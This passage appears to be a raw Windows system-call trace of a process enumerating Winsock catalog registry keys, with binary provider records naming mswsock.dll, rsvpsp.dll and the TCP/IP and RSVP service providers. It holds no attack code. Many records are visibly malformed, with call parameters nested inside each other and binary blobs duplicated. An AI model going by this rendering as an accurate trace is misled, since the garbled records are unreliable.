\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\26\0\2\0\0\0\220\0\0\0\35\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\36\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0 (480, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\mswsock.dll\0gram\FSLSP.DLL\0\00\0\0\0\10\0\2\0\10\0\4\1\10\0h\220\354\28\220\354\2\2\0\12\0\4\1\12\00\00\0\0\0\10\0\2\0\14\0\4\1\10\0\210\220\354\2X\220\354\2\2\0\16\0\4\1\12\00\00\0\0\0\10\0\2\0\20\0\4\1\10\0\250\220\354\2x\220\354\2\2\0\22\0\4\1\12\00\00\0\0\0\10\0\2\0\24\0\4\1\10\0\310\220\354\2\230\220\354\2\2\0\26\0\4\1\12\00\00\0\0\0\10\0\2\0\30\0\4\1\10\0\0\0\0\0\270\220\354\2\2\0\32\0\4\1\10\0H\0K\0R\0\0\0\3\0\34\0\4\1\10\0\360\222\354\2\0\0\0\0\0\221\354\2\16\0\0\0<\0\37\0\4\0\10\0X\3\10\0X\3\10\0\4\0\2\0\11\6\2\0\0\0\0\0\0\0\0\0\0\0\0\0\14\0\0\0\240\32\17\347\213\253\317\21\214\243\0\200_H\241\222\353\3\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\3\0\0\0\0\0\0\0\377\0\0\0\0\0\0\0\0\0\0\0\273\377\0\0\0\0\0\0M\0S\0A\0F\0D\0 \0T\0c\0p\0i\0p\0 \0[\0R\0A\0W\0/\0I\0P\0]\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\204\3\0\0\33\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\340\1\0\0\33\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\34\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\334\1\0\0\374\342\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\20\347\26\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\04\0\34\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\340\1\0\0\35\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\26\0\2\0\0\0\220\0\0\0\35\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0\36\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0
 03611   456   NtClose  (480, ... ) == 0x0
 03612   456   NtOpenKey  (0x20019, {24, 476, 0x40, 0, 0,  (0x20019, {24, 476, 0x40, 0, 0, "000000000004"}, ... 480, ) }, ... 480, ) == 0x0
 03613   456   NtQueryValueKey  (480,  (480, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 03614   456   NtQueryValueKey  (480,  (480, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 03615   456   NtQueryValueKey  (480,  (480, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\rsvpsp.dll\0\0gram\FSLSP.DLL\0\00\0\0\0\10\0\2\0\10\0\4\1\10\0h\220\354\28\220\354\2\2\0\12\0\4\1\12\00\00\0\0\0\10\0\2\0\14\0\4\1\10\0\210\220\354\2X\220\354\2\2\0\16\0\4\1\12\00\00\0\0\0\10\0\2\0\20\0\4\1\10\0\250\220\354\2x\220\354\2\2\0\22\0\4\1\12\00\00\0\0\0\10\0\2\0\24\0\4\1\10\0\310\220\354\2\230\220\354\2\2\0\26\0\4\1\12\00\00\0\0\0\10\0\2\0\30\0\4\1\10\0\0\0\0\0\270\220\354\2\2\0\32\0\4\1\10\0H\0K\0R\0\0\0\3\0\34\0\4\1\10\0\360\222\354\2\0\0\0\0\0\221\354\2\16\0\0\0<\0\37\0\4\0\10\0X\3\10\0X\3\10\0\4\0\2\0\11&\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0\340\251`\235z3\320\21\275\210\0\0\300\202\346\232\354\3\0\0\1\0\0\0\310\371\252\1\26\0\30\0\10<_u\0\0\0\0|\370\252\1\27\207`u\0\0\0\0\6\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\2\0\0\0\21\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\273\377\0\0\0\0\0\0R\0S\0V\0P\0 \0U\0D\0P\0 \0S\0e\0r\0v\0i\0c\0e\0 \0P\0r\0o\0v\0i\0d\0e\0r\0\0\0\30\371\252\1\17.\365w\13\30\365w\1\0\0\0\0\374\252\1\4\0\0\0\0\0\0\0\0\0\0\0\1\0\0\0\17.\365w\0\0\0\0\250\371\252\1 \22\365wO\22\365wT\22\365w\0\0\0\0\204\3\0\0 \16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\340\1\0\0 \16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0!\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\334\1\0\0\374\342\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\20\347\26\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\05\0!\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\340\1\0\0"\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\26\0\2\0\0\0\220\0\0\0"\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0#\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (480, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\rsvpsp.dll\0\0gram\FSLSP.DLL\0\00\0\0\0\10\0\2\0\10\0\4\1\10\0h\220\354\28\220\354\2\2\0\12\0\4\1\12\00\00\0\0\0\10\0\2\0\14\0\4\1\10\0\210\220\354\2X\220\354\2\2\0\16\0\4\1\12\00\00\0\0\0\10\0\2\0\20\0\4\1\10\0\250\220\354\2x\220\354\2\2\0\22\0\4\1\12\00\00\0\0\0\10\0\2\0\24\0\4\1\10\0\310\220\354\2\230\220\354\2\2\0\26\0\4\1\12\00\00\0\0\0\10\0\2\0\30\0\4\1\10\0\0\0\0\0\270\220\354\2\2\0\32\0\4\1\10\0H\0K\0R\0\0\0\3\0\34\0\4\1\10\0\360\222\354\2\0\0\0\0\0\221\354\2\16\0\0\0<\0\37\0\4\0\10\0X\3\10\0X\3\10\0\4\0\2\0\11&\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0\340\251`\235z3\320\21\275\210\0\0\300\202\346\232\354\3\0\0\1\0\0\0\310\371\252\1\26\0\30\0\10<_u\0\0\0\0|\370\252\1\27\207`u\0\0\0\0\6\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\2\0\0\0\21\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\273\377\0\0\0\0\0\0R\0S\0V\0P\0 \0U\0D\0P\0 \0S\0e\0r\0v\0i\0c\0e\0 \0P\0r\0o\0v\0i\0d\0e\0r\0\0\0\30\371\252\1\17.\365w\13\30\365w\1\0\0\0\0\374\252\1\4\0\0\0\0\0\0\0\0\0\0\0\1\0\0\0\17.\365w\0\0\0\0\250\371\252\1 \22\365wO\22\365wT\22\365w\0\0\0\0\204\3\0\0 \16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\340\1\0\0 \16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0!\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\334\1\0\0\374\342\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\20\347\26\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\05\0!\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\340\1\0\0"\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\26\0\2\0\0\0\220\0\0\0"\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0#\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0 (480, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\rsvpsp.dll\0\0gram\FSLSP.DLL\0\00\0\0\0\10\0\2\0\10\0\4\1\10\0h\220\354\28\220\354\2\2\0\12\0\4\1\12\00\00\0\0\0\10\0\2\0\14\0\4\1\10\0\210\220\354\2X\220\354\2\2\0\16\0\4\1\12\00\00\0\0\0\10\0\2\0\20\0\4\1\10\0\250\220\354\2x\220\354\2\2\0\22\0\4\1\12\00\00\0\0\0\10\0\2\0\24\0\4\1\10\0\310\220\354\2\230\220\354\2\2\0\26\0\4\1\12\00\00\0\0\0\10\0\2\0\30\0\4\1\10\0\0\0\0\0\270\220\354\2\2\0\32\0\4\1\10\0H\0K\0R\0\0\0\3\0\34\0\4\1\10\0\360\222\354\2\0\0\0\0\0\221\354\2\16\0\0\0<\0\37\0\4\0\10\0X\3\10\0X\3\10\0\4\0\2\0\11&\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0\340\251`\235z3\320\21\275\210\0\0\300\202\346\232\354\3\0\0\1\0\0\0\310\371\252\1\26\0\30\0\10<_u\0\0\0\0|\370\252\1\27\207`u\0\0\0\0\6\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\2\0\0\0\21\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\273\377\0\0\0\0\0\0R\0S\0V\0P\0 \0U\0D\0P\0 \0S\0e\0r\0v\0i\0c\0e\0 \0P\0r\0o\0v\0i\0d\0e\0r\0\0\0\30\371\252\1\17.\365w\13\30\365w\1\0\0\0\0\374\252\1\4\0\0\0\0\0\0\0\0\0\0\0\1\0\0\0\17.\365w\0\0\0\0\250\371\252\1 \22\365wO\22\365wT\22\365w\0\0\0\0\204\3\0\0 \16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\340\1\0\0 \16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0!\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\334\1\0\0\374\342\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\20\347\26\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\05\0!\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\340\1\0\0"\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\26\0\2\0\0\0\220\0\0\0"\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0#\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0#\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0 (480, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\rsvpsp.dll\0\0gram\FSLSP.DLL\0\00\0\0\0\10\0\2\0\10\0\4\1\10\0h\220\354\28\220\354\2\2\0\12\0\4\1\12\00\00\0\0\0\10\0\2\0\14\0\4\1\10\0\210\220\354\2X\220\354\2\2\0\16\0\4\1\12\00\00\0\0\0\10\0\2\0\20\0\4\1\10\0\250\220\354\2x\220\354\2\2\0\22\0\4\1\12\00\00\0\0\0\10\0\2\0\24\0\4\1\10\0\310\220\354\2\230\220\354\2\2\0\26\0\4\1\12\00\00\0\0\0\10\0\2\0\30\0\4\1\10\0\0\0\0\0\270\220\354\2\2\0\32\0\4\1\10\0H\0K\0R\0\0\0\3\0\34\0\4\1\10\0\360\222\354\2\0\0\0\0\0\221\354\2\16\0\0\0<\0\37\0\4\0\10\0X\3\10\0X\3\10\0\4\0\2\0\11&\2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0\340\251`\235z3\320\21\275\210\0\0\300\202\346\232\354\3\0\0\1\0\0\0\310\371\252\1\26\0\30\0\10<_u\0\0\0\0|\370\252\1\27\207`u\0\0\0\0\6\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\2\0\0\0\21\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\273\377\0\0\0\0\0\0R\0S\0V\0P\0 \0U\0D\0P\0 \0S\0e\0r\0v\0i\0c\0e\0 \0P\0r\0o\0v\0i\0d\0e\0r\0\0\0\30\371\252\1\17.\365w\13\30\365w\1\0\0\0\0\374\252\1\4\0\0\0\0\0\0\0\0\0\0\0\1\0\0\0\17.\365w\0\0\0\0\250\371\252\1 \22\365wO\22\365wT\22\365w\0\0\0\0\204\3\0\0 \16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\340\1\0\0 \16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0!\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\334\1\0\0\374\342\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\20\347\26\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\05\0!\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\340\1\0\0"\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\26\0\2\0\0\0\220\0\0\0"\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0#\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0
 03616   456   NtClose  (480, ... ) == 0x0
 03617   456   NtOpenKey  (0x20019, {24, 476, 0x40, 0, 0,  (0x20019, {24, 476, 0x40, 0, 0, "000000000005"}, ... 480, ) }, ... 480, ) == 0x0
 03618   456   NtQueryValueKey  (480,  (480, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 03619   456   NtQueryValueKey  (480,  (480, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 03620   456   NtAllocateVirtualMemory  (-1, 1507328, 0, 4096, 4096, 4, ... 1507328, 4096, ) == 0x0
 03621   456   NtQueryValueKey  (480,  (480, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\rsvpsp.dll\0\0gram\FSLSP.DLL\0\00\0\0\0\10\0\2\0\10\0\4\1\10\0h\220\354\28\220\354\2\2\0\12\0\4\1\12\00\00\0\0\0\10\0\2\0\14\0\4\1\10\0\210\220\354\2X\220\354\2\2\0\16\0\4\1\12\00\00\0\0\0\10\0\2\0\20\0\4\1\10\0\250\220\354\2x\220\354\2\2\0\22\0\4\1\12\00\00\0\0\0\10\0\2\0\24\0\4\1\10\0\310\220\354\2\230\220\354\2\2\0\26\0\4\1\12\00\00\0\0\0\10\0\2\0\30\0\4\1\10\0\0\0\0\0\270\220\354\2\2\0\32\0\4\1\10\0H\0K\0R\0\0\0\3\0\34\0\4\1\10\0\360\222\354\2\0\0\0\0\0\221\354\2\16\0\0\0<\0\37\0\4\0\10\0X\3\10\0X\3\10\0\4\0\2\0f \2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0\340\251`\235z3\320\21\275\210\0\0\300\202\346\232\355\3\0\0\1\0\0\0\17.\365w\13\30\365w\0\0\0\0\4+Y\1\2\0\0\0\1\0\0\0\17.\365w\6\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\1\0\0\0\6\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0R\0S\0V\0P\0 \0T\0C\0P\0 \0S\0e\0r\0v\0i\0c\0e\0 \0P\0r\0o\0v\0i\0d\0e\0r\0\0\0\0\0\0\0\362_du\3`du\240\1\10\0\250\5N\1 \0\0\0\0\0\0\0\240\1\10\0\310\5N\1H\344\301\0\0\0\0\0\0\0\0\0\0\0\245\0\0\0\10\0@\5N\1\0\0\0\0\204\3\0\0&\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\340\1\0\0&\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0'\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\334\1\0\0\374\342\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\20\347\26\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\06\0'\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\340\1\0\0(\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\26\0\2\0\0\0\220\0\0\0(\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0)\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) , Partial, 900, ... TitleIdx=0, Type=3, Data= (480, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\rsvpsp.dll\0\0gram\FSLSP.DLL\0\00\0\0\0\10\0\2\0\10\0\4\1\10\0h\220\354\28\220\354\2\2\0\12\0\4\1\12\00\00\0\0\0\10\0\2\0\14\0\4\1\10\0\210\220\354\2X\220\354\2\2\0\16\0\4\1\12\00\00\0\0\0\10\0\2\0\20\0\4\1\10\0\250\220\354\2x\220\354\2\2\0\22\0\4\1\12\00\00\0\0\0\10\0\2\0\24\0\4\1\10\0\310\220\354\2\230\220\354\2\2\0\26\0\4\1\12\00\00\0\0\0\10\0\2\0\30\0\4\1\10\0\0\0\0\0\270\220\354\2\2\0\32\0\4\1\10\0H\0K\0R\0\0\0\3\0\34\0\4\1\10\0\360\222\354\2\0\0\0\0\0\221\354\2\16\0\0\0<\0\37\0\4\0\10\0X\3\10\0X\3\10\0\4\0\2\0f \2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0\340\251`\235z3\320\21\275\210\0\0\300\202\346\232\355\3\0\0\1\0\0\0\17.\365w\13\30\365w\0\0\0\0\4+Y\1\2\0\0\0\1\0\0\0\17.\365w\6\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\1\0\0\0\6\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0R\0S\0V\0P\0 \0T\0C\0P\0 \0S\0e\0r\0v\0i\0c\0e\0 \0P\0r\0o\0v\0i\0d\0e\0r\0\0\0\0\0\0\0\362_du\3`du\240\1\10\0\250\5N\1 \0\0\0\0\0\0\0\240\1\10\0\310\5N\1H\344\301\0\0\0\0\0\0\0\0\0\0\0\245\0\0\0\10\0@\5N\1\0\0\0\0\204\3\0\0&\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\340\1\0\0&\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0'\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\334\1\0\0\374\342\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\20\347\26\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\06\0'\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\340\1\0\0(\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\26\0\2\0\0\0\220\0\0\0(\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0)\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) \0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\26\0\2\0\0\0\220\0\0\0(\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0)\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0 (480, "PackedCatalogItem", Partial, 900, ... TitleIdx=0, Type=3, Data="%SystemRoot%\system32\rsvpsp.dll\0\0gram\FSLSP.DLL\0\00\0\0\0\10\0\2\0\10\0\4\1\10\0h\220\354\28\220\354\2\2\0\12\0\4\1\12\00\00\0\0\0\10\0\2\0\14\0\4\1\10\0\210\220\354\2X\220\354\2\2\0\16\0\4\1\12\00\00\0\0\0\10\0\2\0\20\0\4\1\10\0\250\220\354\2x\220\354\2\2\0\22\0\4\1\12\00\00\0\0\0\10\0\2\0\24\0\4\1\10\0\310\220\354\2\230\220\354\2\2\0\26\0\4\1\12\00\00\0\0\0\10\0\2\0\30\0\4\1\10\0\0\0\0\0\270\220\354\2\2\0\32\0\4\1\10\0H\0K\0R\0\0\0\3\0\34\0\4\1\10\0\360\222\354\2\0\0\0\0\0\221\354\2\16\0\0\0<\0\37\0\4\0\10\0X\3\10\0X\3\10\0\4\0\2\0f \2\0\0\0\0\0\0\0\0\0\0\0\0\0\10\0\0\0\340\251`\235z3\320\21\275\210\0\0\300\202\346\232\355\3\0\0\1\0\0\0\17.\365w\13\30\365w\0\0\0\0\4+Y\1\2\0\0\0\1\0\0\0\17.\365w\6\0\0\0\2\0\0\0\20\0\0\0\20\0\0\0\1\0\0\0\6\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0R\0S\0V\0P\0 \0T\0C\0P\0 \0S\0e\0r\0v\0i\0c\0e\0 \0P\0r\0o\0v\0i\0d\0e\0r\0\0\0\0\0\0\0\362_du\3`du\240\1\10\0\250\5N\1 \0\0\0\0\0\0\0\240\1\10\0\310\5N\1H\344\301\0\0\0\0\0\0\0\0\0\0\0\245\0\0\0\10\0@\5N\1\0\0\0\0\204\3\0\0&\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\0\0\1\0\0\0\0\0\4\0\0\0\340\1\0\0&\16\0\0\304\1\0\0\310\1\0\0\17\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0'\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\0\0\1\0\0\0\0\0H\0\0\0\31\0\2\0\0\0\0\0\30\0\0\0\334\1\0\0\374\342\22\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\30\0\32\0\20\347\26\0\0\0\0\00\00\00\00\00\00\00\00\00\00\00\06\0'\16\0\0\304\1\0\0\310\1\0\0Q\0\0\0\1\0\1\0\0\0\0\0\10\0\0\0\0\0\0\0\340\1\0\0(\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0t\0e\0m\0\26\0\2\0\0\0\220\0\0\0(\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\1\0\1\0\5\0\0\200\0\0\0\0)\16\0\0\304\1\0\0\310\1\0\0\200\0\0\0\0\0\1\0\0\0\0\0@\0\0\0\340\1\0\0\0\0\0\0"\0\12\2\0\354\375\177\0\0\0\0P\0a\0c\0k\0e\0d\0C\0a\0t\0a\0l\0o\0g\0I\0"}, 900, ) }, 900, ) == 0x0
 03622   456   NtClose  (480, ... ) == 0x0
 03623   456   NtOpenKey  (0x20019, {24, 476, 0x40, 0, 0,  (0x20019, {24, 476, 0x40, 0, 0, "000000000006"}, ... 480, ) }, ... 480, ) == 0x0
 03624   456   NtQueryValueKey  (480,  (480, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 03625   456   NtQueryValueKey  (480,  (480, "PackedCatalogItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
